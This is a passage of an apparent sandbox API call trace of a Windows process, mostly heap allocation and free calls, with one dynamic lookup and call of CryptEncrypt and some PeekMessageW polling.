lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ba8 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc98 [0223.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0223.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0223.267] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c28 [0223.267] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0223.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0223.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcb0 [0223.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0223.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0223.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0223.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d78 [0223.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc08 [0223.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0223.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0223.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0223.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0223.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0223.268] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.268] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0223.269] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0223.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bb8 [0223.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0223.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0223.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcb0 [0223.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0223.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0223.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0223.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0223.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cf8 [0223.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.270] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cf8 | out: hHeap=0x2af0000) returned 1 [0223.270] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cc8 [0223.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc98 [0223.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0223.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0223.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc08 [0223.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0223.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0223.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc08 | out: hHeap=0x2af0000) returned 1 [0223.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc98 [0223.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0223.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0223.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd) returned 0x2aabcb0 [0223.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabcb0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0223.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcb0 | out: hHeap=0x2af0000) returned 1 [0223.271] GetProcAddress (hModule=0x76390000, lpProcName="CryptEncrypt") returned 0x763c2cf0 [0223.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0223.271] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1c) returned 0x2a77fa8 [0223.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0223.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0223.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0223.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0223.271] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0223.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0223.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0223.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0223.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0223.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0223.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fa8 | out: hHeap=0x2af0000) returned 1 [0223.272] CryptEncrypt (in: hKey=0x9e1eb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x116, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x118) returned 1 [0223.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3865f58 [0223.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0223.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0223.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb48 [0223.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0223.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0223.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0223.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc08 [0223.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc98 [0223.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0223.272] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0223.272] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabce0 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc38 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc98 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c68 [0223.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc98 | out: hHeap=0x2af0000) returned 1 [0223.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcf8 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabcc8 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d98 [0223.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0223.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb78 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0223.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.273] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbd8 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbc0 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.273] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c38 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabae8 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0223.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabae8 [0223.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0223.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabbc0 [0223.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb18 | out: hHeap=0x2af0000) returned 1 [0223.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb18 [0223.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabc20 [0223.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aabb30 [0223.274] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bc8 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb30 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d78 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0223.274] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab980 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7b8 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba58 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabab8 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba40 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb00 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc50 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0288 | out: hHeap=0x2af0000) returned 1 [0223.275] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0223.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0223.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0223.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x3866a20 [0223.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x3865f58 | out: hHeap=0x2af0000) returned 1 [0223.276] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0223.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ca8 [0223.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c88 [0223.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0223.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0223.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaba10 [0223.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0223.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d98 [0223.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0223.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0223.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0223.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9f8 | out: hHeap=0x2af0000) returned 1 [0223.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0223.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0223.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0223.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0223.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0223.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0223.276] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0223.276] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.276] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0223.277] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c98 [0223.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0223.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab830 [0223.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab8a8 [0223.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c68 [0223.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9e0 [0223.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0223.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0223.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0223.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0223.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0223.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0223.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab800 | out: hHeap=0x2af0000) returned 1 [0223.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0223.277] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8d8 | out: hHeap=0x2af0000) returned 1 [0223.277] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0223.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0223.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab950 [0223.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab9f8 [0223.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0223.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab890 [0223.277] 